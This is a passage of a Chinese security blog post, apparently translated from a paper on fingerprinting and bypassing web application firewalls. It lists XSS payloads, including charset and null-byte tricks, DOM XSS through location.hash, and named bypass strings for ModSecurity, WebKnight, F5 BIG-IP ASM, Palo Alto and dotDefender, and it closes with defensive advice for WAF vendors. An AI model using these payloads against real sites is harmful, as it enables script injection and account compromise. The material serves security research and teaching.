<p>结果<br><figure class="highlight cal"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">encodeURIComponent(&amp;<span class="string">#039</span>;&amp;<span class="string">#039</span>;-alert(<span class="number">1</span>)-&amp;<span class="string">#039</span>;&amp;<span class="string">#039</span>;)</span><br><span class="line">encodeURIComponent(&amp;<span class="string">#039</span>;&amp;<span class="string">#039</span>;-prompt(<span class="number">1</span>)-&amp;<span class="string">#039</span>;&amp;<span class="string">#039</span>;)</span><br></pre></td></tr></table></figure></p>
<p>输入反射在svg标签内</p>
<p>源码如下：<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="title">svg</span>&gt;</span><span class="tag">&lt;<span class="title">script</span>&gt;</span><span class="dns">varmyvar=”YourInput”<span class="comment">;</span></span><span class="tag">&lt;/<span class="title">script</span>&gt;</span><span class="tag">&lt;/<span class="title">svg</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>可以输入<br><figure class="highlight kotlin"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">www.site.com/test.php?<span class="variable"><span class="keyword">var</span></span>=text”;alert(<span class="number">1</span>)<span class="comment">//</span></span><br></pre></td></tr></table></figure></p>
<p>如果系统编码了”字符<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="title">svg</span>&gt;</span><span class="tag">&lt;<span class="title">script</span>&gt;</span><span class="ini"><span class="setting">varmyvar=<span class="value"><span class="string">"text&amp;quot;;alert(1)//"</span>;</span></span></span><span class="tag">&lt;/<span class="title">script</span>&gt;</span><span class="tag">&lt;/<span class="title">svg</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>原因是引入了附加的（XML）到HTML内容里，可以使用2次编码处理</p>
<h2 id="浏览器BUG">浏览器BUG</h2><p>字符集BUG</p>
<p>字符集BUG在IE中很普遍，最早的bug是UTF-7。如果能控制字符集编码，我们可以绕过99% 的WAF过滤。</p>
<p>示例<br><figure class="highlight groovy"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">http:</span><span class="comment">//xsst.sinaapp.com/utf-32-1.php?charset=utf-8&amp;v=XSS</span></span><br></pre></td></tr></table></figure></p>
<p>可以控制编码，提交<br><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="rule"><span class="attribute">http</span>:<span class="value">//xsst.sinaapp.com/utf-<span class="number">32</span>-<span class="number">1</span>.php?charset=utf-<span class="number">8</span>&amp;v=”&gt;&lt;img</span><br><span class="line">src=x onerror=<span class="function">prompt</span>(<span class="number">0</span>)</span></span>;&gt;</span><br></pre></td></tr></table></figure></p>
<p>可以修改为UTF-32编码形式<br><figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">∀㸀㰀script㸀alert(<span class="number">1</span>)㰀/script㸀</span><br><span class="line">http:<span class="regexp">//xsst</span>.sinaapp.com/utf-<span class="number">32</span>-<span class="number">1</span>.php?charset=utf-<span class="number">32</span>&amp;v=<span class="variable">%E2</span><span class="variable">%88</span><span class="variable">%80</span><span class="variable">%E3</span><span class="variable">%B8</span><span class="variable">%80</span><span class="variable">%E3</span><span class="variable">%B0</span><span class="variable">%80script</span><span class="variable">%E3</span><span class="variable">%B8</span><span class="variable">%80alert</span>(<span class="number">1</span>)<span class="variable">%E3</span><span class="variable">%B0</span><span class="variable">%80</span>/script<span class="variable">%E3</span><span class="variable">%B8</span><span class="variable">%80</span></span><br></pre></td></tr></table></figure></p>
<p>空字节</p>
<p>最长用来绕过mod_security防火墙，形式如下：<br><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;scri%00pt&gt;</span><span class="keyword">alert</span>(1);&lt;/scri<span class="number">%00</span>pt&gt;</span><br><span class="line"><span class="tag">&lt;scri\x00pt&gt;</span><span class="keyword">alert</span>(1);&lt;/scri<span class="number">%00</span>pt&gt;</span><br><span class="line"><span class="tag">&lt;s%00c%00r%00%00ip%00t&gt;</span><span class="keyword">confirm</span>(0);&lt;/s<span class="number">%00</span>c<span class="number">%00</span>r<span class="number">%00</span><span class="number">%00</span>ip<span class="number">%00</span>t&gt;</span><br></pre></td></tr></table></figure></p>
<p>空字节只适用于PHP 5.3.8以上的版本</p>
<p>语法BUG</p>
<p>RFC声明中节点名称不能是空格，以下的形式在javascript中不能运行<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="title">script</span>&gt;</span><span class="dns">alert(1)<span class="comment">;</span></span><span class="tag">&lt;/<span class="title">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">%0ascript</span>&gt;</span>alert(1);<span class="tag">&lt;/<span class="title">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">%0bscript</span>&gt;</span>alert(1);<span class="tag">&lt;/<span class="title">script</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p><code>&lt;%</code>, <code>&lt;//</code>, <code>&lt;!</code>,<code>&lt;?</code>可以被解析成<code>&lt;</code>，所以可以使用以下的payload<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;//     <span class="attribute">style</span>=<span class="value">x:expression\28write(1)\29</span>&gt;</span> // Works upto IE7</span><br></pre></td></tr></table></figure></p>
<p>参考<a href="http://html5sec.org/#71" target="_blank" rel="external">http://html5sec.org/#71</a><br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!--[if]&gt;&lt;script&gt;alert(1)&lt;/script     --&gt;</span> // Works upto IE9</span><br></pre></td></tr></table></figure></p>
<p>参考<a href="http://html5sec.org/#115" target="_blank" rel="external">http://html5sec.org/#115</a></p>
<pre><code><span class="pi">&lt;?xml-stylesheet     type="text/css"?&gt;</span><span class="tag">&lt;<span class="title">root</span>     <span class="attribute">style</span>=<span class="value">"x:expression(write(1))"</span>/&gt;</span> // Works in IE7
</code></pre><p>参考 <a href="http://html5sec.org/#77" target="_blank" rel="external">http://html5sec.org/#77</a><br><figure class="highlight mel"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="variable">%div</span><span class="variable">%20style</span>=xss:<span class="keyword">expression</span>(prompt(<span class="number">1</span>))&gt;     <span class="comment">// Works Upto IE7</span></span><br></pre></td></tr></table></figure></p>
<p>Unicode分隔符</p>
<p><code>[on\w+\s*]</code>这个规则过滤了所有on事件，为了验证每个浏览器中有效的分隔符，可以使用fuzzing方法测试0×00到0xff，结果如下：<br><figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">IExplorer=     <span class="special">[</span>0x09,0x0B,0x0C,0x20,0x3B<span class="special">]</span></span><br><span class="line">Chrome =     <span class="special">[</span>0x09,0x20,0x28,0x2C,0x3B<span class="special">]</span></span><br><span class="line">Safari = <span class="special">[</span>0x2C,0x3B<span class="special">]</span></span><br><span class="line">FireFox=     <span class="special">[</span>0x09,0x20,0x28,0x2C,0x3B<span class="special">]</span></span><br><span class="line">Opera = <span class="special">[</span>0x09,0x20,0x2C,0x3B<span class="special">]</span></span><br><span class="line">Android =     <span class="special">[</span>0x09,0x20,0x28,0x2C,0x3B<span class="special">]</span></span><br><span class="line">x0b在Mod_security中已经被过滤，绕过的方法：</span><br><span class="line">&lt;a/onmouseover<span class="special">[</span><span class="command">\x</span>0b<span class="special">]</span>=location=<span class="special">&amp;</span><span class="special">#</span>039;<span class="command">\x</span>6A<span class="command">\x</span>61<span class="command">\x</span>76<span class="command">\x</span>61<span class="command">\x</span>73<span class="command">\x</span>63<span class="command">\x</span>72<span class="command">\x</span>69<span class="command">\x</span>70<span class="command">\x</span>74<span class="command">\x</span>3A<span class="command">\x</span>61<span class="command">\x</span>6C<span class="command">\x</span>65<span class="command">\x</span>72<span class="command">\x</span>74<span class="command">\x</span>28<span class="command">\x</span>30<span class="command">\x</span>29<span class="command">\x</span>3B<span class="special">&amp;</span><span class="special">#</span>039;&gt;rhainfosec</span><br></pre></td></tr></table></figure></p>
<p>缺少X-frame选项</p>
<p>通常会认为X-frame是用来防护点击劫持的配置，其实也可以防护使用iframe引用的xss漏洞</p>
<p>Docmodes</p>
<p>IE引入了doc-mode很长时间，提供给老版本浏览器的后端兼容性，有风险，攻击情景是黑客可以引用你站点的框架，他可以引入doc-mode执行css表达式<br><figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">expression<span class="list">(<span class="keyword">open</span><span class="list">(<span class="keyword">alert</span><span class="list">(<span class="number">1</span>)</span>)</span>)</span></span><br></pre></td></tr></table></figure></p>
<p>以下POC可以插入到IE7中<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="title">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">meta</span> <span class="attribute">http-equiv</span>=<span class="value">"X-UA-Compatible"</span> <span class="attribute">content</span>=<span class="value">"IE=EmulateIE7"</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">iframesrc="https:</span>//<span class="attribute">targetwebsite.com</span>"&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="title">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="title">html</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>Window.name欺骗</p>
<p>情景：我们用iframe加载一个页面，我们可以控制窗口的名称，这里也可以执行javascript代码</p>
<p>POC<br><figure class="highlight nix"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">    &lt;<span class="variable">iframesrc=</span>&amp;<span class="comment">#039;http://www.target.com?foo="xss  autofocus/AAAAA  onfocus=location=window.name//&amp;#039;</span></span><br><span class="line"><span class="variable">name=</span><span class="string">"javascript:alert("</span>XSS<span class="string">")"</span>&gt;&lt;/iframe&gt;</span><br></pre></td></tr></table></figure></p>
<h2 id="DOM型XSS">DOM型XSS</h2><p>服务器不支持过滤DOM型的XSS，因为DOM型XSS总是在客户端执行，看一个例子：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="title">script</span>&gt;</span><span class="dns"></span><br><span class="line">vari=location.hash<span class="comment">;</span></span><br><span class="line">document.write(i)<span class="comment">;</span></span><br><span class="line"></span><span class="tag">&lt;/<span class="title">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>在一些情况下，反射型XSS可以转换成DOM型XSS：<br><figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="link_url">http://www.target.com/xss.php?foo=&lt;svg/onload=location=/java/.source+/script/.source+location.hash</span>[<span class="link_label">1</span>]<span class="code">+/al/.source+</span>/ert/.source<span class="code">+location.hash[2]+</span>/docu/.source<span class="code">+/ment.domain/.source+</span>location.hash[3]//#:()</span><br></pre></td></tr></table></figure></p>
<p>上面的POC只在[.+都被允许的情况下适用，可以使用location.hash注入任何不允许的编码</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Location<span class="class">.hash</span>[<span class="number">1</span>] = :  <span class="comment">// Defined at the first position after the hash.</span></span><br><span class="line">Location<span class="class">.hash</span>[<span class="number">2</span>]= (  <span class="comment">// Defined at the second position after the hash</span></span><br><span class="line">Location<span class="class">.hash</span>[<span class="number">3</span>] = ) <span class="comment">// Defined     at third position after the hash.</span></span><br></pre></td></tr></table></figure>
<p>如果有客户端过滤可能不适用</p>
<h2 id="绕过">绕过</h2><p>ModSecurity绕过</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;scri<span class="comment">%00pt&gt;confirm(0);&lt;/scri%00pt&gt;</span></span><br><span class="line">&lt;a/onmouseover<span class="special">[</span><span class="command">\x</span>0b<span class="special">]</span>=location=<span class="special">&amp;</span><span class="special">#</span>039;<span class="command">\x</span>6A<span class="command">\x</span>61<span class="command">\x</span>76<span class="command">\x</span>61<span class="command">\x</span>73<span class="command">\x</span>63<span class="command">\x</span>72<span class="command">\x</span>69<span class="command">\x</span>70<span class="command">\x</span>74<span class="command">\x</span>3A<span class="command">\x</span>61<span class="command">\x</span>6C<span class="command">\x</span>65<span class="command">\x</span>72<span class="command">\x</span>74<span class="command">\x</span>28<span class="command">\x</span>30<span class="command">\x</span>29<span class="command">\x</span>3B<span class="special">&amp;</span><span class="special">#</span>039;&gt;rhainfosec</span><br></pre></td></tr></table></figure>
<p>参考 <a href="http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html" target="_blank" rel="external">http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html</a></p>
<p>WEB KNIGHT绕过<br><figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;isindex action=j&amp;<span class="keyword">Tab</span>;a&amp;<span class="keyword">Tab</span>;vas&amp;<span class="keyword">Tab</span>;c&amp;<span class="keyword">Tab</span>;r&amp;<span class="keyword">Tab</span>;ipt:alert(1) <span class="keyword">type</span>=image&gt;</span><br><span class="line">&lt;marquee/onstart=<span class="keyword">confirm</span>(2)&gt;</span><br></pre></td></tr></table></figure></p>
<p>F5 BIG IP ASM and Palo ALTO绕过<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="tag">table</span> <span class="attribute">background</span>=<span class="string">"javascript:alert(1)"</span>&gt;&lt;/table&gt; <span class="comment">//IE6或者低版本Opera</span></span><br><span class="line">“/&gt;&lt;marquee  onfinish=<span class="function"><span class="title">confirm</span><span class="params">(<span class="number">123</span>)</span></span>&gt;a&lt;/marquee&gt;</span><br></pre></td></tr></table></figure></p>
<p>Dot Defender绕过<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="title">svg</span>/<span class="attribute">onload</span>=<span class="value">prompt(1);</span>&gt;</span> </span><br><span class="line"><span class="tag">&lt;<span class="title">isindex</span> <span class="attribute">action</span>=<span class="value">"javas&amp;tab;cript:alert(1)"</span> <span class="attribute">type</span>=<span class="value">image</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">marquee</span>/<span class="attribute">onstart</span>=<span class="value">confirm(2)</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<h2 id="结论：">结论：</h2><p>黑名单方式永远不是最好的解决办法，但是相对与白名单效率很高，对于WAF供应商来说，最好的实践如下：</p>
<p>1、开发者和管理员要注意WAF只能缓解攻击，并且针对已知的弱点的防护只是和源代码修复的方法打个时间差；</p>
<p>2、要保持WAF的规则库更新；</p>
<p>3、WAF可以配置参数限制，需要提供手册用于配置参数content-length最大最小长度，content-type类型，在入侵时进行告警；</p>
<p>4、如果WAF依据黑名单，要确保可以阻断已知的浏览器BUG，并且相应规则库要及时更新。</p>
<p>来源：Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters</p>
<p>原作者：RAFAY BALOCH,TANZIL JAFFERY</p>
</span>
      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/XSS/" rel="tag">#XSS</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-prev post-nav-item">
            
              <a href="/2013/12/20/关于DOM级别的一些问题/" rel="prev">关于DOM级别的一些问题</a>
            
          </div>

          <div class="post-nav-next post-nav-item">
            
              <a href="/2013/12/07/css之 margin 详解/" rel="next">css之 margin 详解</a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>

 </div>

        

        
          <div class="comments" id="comments">
            
          </div>
        
      </div>

      
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" src="/images/tx.jpg" alt="Go7hic" itemprop="image"/>
          <p class="site-author-name" itemprop="name">Go7hic</p>
        </div>
        <p class="site-description motion-element" itemprop="description">jsut 4 fun</p>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">76</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          <div class="site-state-item site-state-categories">
            
              <span class="site-state-item-count">0</span>
              <span class="site-state-item-name">分类</span>
              
          </div>

          <div class="site-state-item site-state-tags">
            <a href="/tags">
              <span class="site-state-item-count">19</span>
              <span class="site-state-item-name">标签</span>
              </a>
          </div>

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="menu-item-icon icon-next-feed"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        <div class="links-of-author motion-element">
          
        </div>

      </section>

      
        <section class="post-toc-wrap sidebar-panel-active">
          <div class="post-toc-indicator-top post-toc-indicator"></div>
          <div class="post-toc">
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#非常规事件监听"><span class="nav-number">1.</span> <span class="nav-text">非常规事件监听</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#JSON内容"><span class="nav-number">2.</span> <span class="nav-text">JSON内容</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#浏览器BUG"><span class="nav-number">3.</span> <span class="nav-text">浏览器BUG</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DOM型XSS"><span class="nav-number">4.</span> <span class="nav-text">DOM型XSS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#绕过"><span class="nav-number">5.</span> <span class="nav-text">绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#结论："><span class="nav-number">6.</span> <span class="nav-text">结论：</span></a></li></ol></div>
            
          </div>
          <div class="post-toc-indicator-bottom post-toc-indicator"></div>
        </section>
      

    </div>
  </aside>


    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner"> <div class="copyright" >
  
  &copy; &nbsp; 
  <span itemprop="copyrightYear">2015</span>
  <span class="with-love">
    <i class="icon-next-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Go7hic</span>
</div>

<div class="">
  「万物之中，希望至美；至美之物，永不凋零」
</div>

 </div>
    </footer>

    <div class="back-to-top"></div>
  </div>

  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  
  
    
    

  


  
  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js"></script>
  <script type="text/javascript" src="/js/fancy-box.js?v=0.4.5.1"></script>


  <script type="text/javascript" src="/js/helpers.js?v=0.4.5.1"></script>
  

  <script type="text/javascript" src="/vendors/velocity/velocity.min.js"></script>
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js"></script>

  <script type="text/javascript" src="/js/motion_global.js?v=0.4.5.1" id="motion.global"></script>




  <script type="text/javascript" src="/js/nav-toggle.js?v=0.4.5.1"></script>
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  
<script type="text/javascript" src="/js/bootstrap.scrollspy.js?v=0.4.5.1" id="bootstrap.scrollspy.custom"></script>


<script type="text/javascript" id="sidebar.toc.highlight">
  $(document).ready(function () {
    var tocSelector = '.post-toc';
    var $tocSelector = $(tocSelector);
    var activeCurrentSelector = '.active-current';

    $tocSelector
      .on('activate.bs.scrollspy', function () {
        var $currentActiveElement = $(tocSelector + ' .active').last();

        removeCurrentActiveClass();
        $currentActiveElement.addClass('active-current');

        $tocSelector[0].scrollTop = $currentActiveElement.position().top;
      })
      .on('clear.bs.scrollspy', function () {
        removeCurrentActiveClass();
      });

    function removeCurrentActiveClass () {
      $(tocSelector + ' ' + activeCurrentSelector)
        .removeClass(activeCurrentSelector.substring(1));
    }

    function processTOC () {
      getTOCMaxHeight();
      toggleTOCOverflowIndicators();
    }

    function getTOCMaxHeight () {
      var height = $('.sidebar').height() -
                   $tocSelector.position().top -
                   $('.post-toc-indicator-bottom').height();

      $tocSelector.css('height', height);

      return height;
    }

    function toggleTOCOverflowIndicators () {
      tocOverflowIndicator(
        '.post-toc-indicator-top',
        $tocSelector.scrollTop() > 0 ? 'show' : 'hide'
      );

      tocOverflowIndicator(
        '.post-toc-indicator-bottom',
        $tocSelector.scrollTop() >= $tocSelector.find('ol').height() - $tocSelector.height() ? 'hide' : 'show'
      )
    }

    $(document).on('sidebar.motion.complete', function () {
      processTOC();
    });

    $('body').scrollspy({ target: tocSelector });
    $(window).on('resize', function () {
      if ( $('.sidebar').hasClass('sidebar-active') ) {
        processTOC();
      }
    });

    onScroll($tocSelector);

    function onScroll (element) {
      element.on('mousewheel DOMMouseScroll', function (event) {
          var oe = event.originalEvent;
          var delta = oe.wheelDelta || -oe.detail;

          this.scrollTop += ( delta < 0 ? 1 : -1 ) * 30;
          event.preventDefault();

          toggleTOCOverflowIndicators();
      });
    }

    function tocOverflowIndicator (indicator, action) {
      var $indicator = $(indicator);
      var opacity = action === 'show' ? 0.4 : 0;
      $indicator.velocity ?
        $indicator.velocity('stop').velocity({
          opacity: opacity
        }, { duration: 100 }) :
        $indicator.stop().animate({
          opacity: opacity
        }, 100);
    }

  });
</script>

<script type="text/javascript" id="sidebar.nav">
  $(document).ready(function () {
    var html = $('html');
    var TAB_ANIMATE_DURATION = 200;
    var hasVelocity = $.isFunction(html.velocity);

    $('.sidebar-nav li').on('click', function () {
      var item = $(this);
      var activeTabClassName = 'sidebar-nav-active';
      var activePanelClassName = 'sidebar-panel-active';
      if (item.hasClass(activeTabClassName)) {
        return;
      }

      var currentTarget = $('.' + activePanelClassName);
      var target = $('.' + item.data('target'));

      hasVelocity ?
        currentTarget.velocity('transition.slideUpOut', TAB_ANIMATE_DURATION, function () {
          target
            .velocity('stop')
            .velocity('transition.slideDownIn', TAB_ANIMATE_DURATION)
            .addClass(activePanelClassName);
        }) :
        currentTarget.animate({ opacity: 0 }, TAB_ANIMATE_DURATION, function () {
          currentTarget.hide();
          target
            .stop()
            .css({'opacity': 0, 'display': 'block'})
            .animate({ opacity: 1 }, TAB_ANIMATE_DURATION, function () {
              currentTarget.removeClass(activePanelClassName);
              target.addClass(activePanelClassName);
            });
        });

      item.siblings().removeClass(activeTabClassName);
      item.addClass(activeTabClassName);
    });

    $('.post-toc a').on('click', function (e) {
      e.preventDefault();
      var targetSelector = escapeSelector(this.getAttribute('href'));
      var offset = $(targetSelector).offset().top;
      hasVelocity ?
        html.velocity('stop').velocity('scroll', {
          offset: offset  + 'px',
          mobileHA: false
        }) :
        $('html, body').stop().animate({
          scrollTop: offset
        }, 500);
    });

    // Expand sidebar on post detail page by default, when post has a toc.
    var $tocContent = $('.post-toc-content');
    if (isDesktop() && CONFIG.sidebar === 'post') {
      if ($tocContent.length > 0 && $tocContent.html().trim().length > 0) {
        displaySidebar();
      }
    }
  });
</script>



  <script type="text/javascript">
    $(document).ready(function () {
      if (CONFIG.sidebar === 'always') {
        displaySidebar();
      }
      if (isMobile()) {
        FastClick.attach(document.body);
      }
    });
  </script>

  

  
  

  
  <script type="text/javascript" src="/js/lazyload.js"></script>
  <script type="text/javascript">
    $(function () {
      $("#posts").find('img').lazyload({
        placeholder: "/images/loading.gif",
        effect: "fadeIn"
      });
    });
  </script>
</body>
</html>
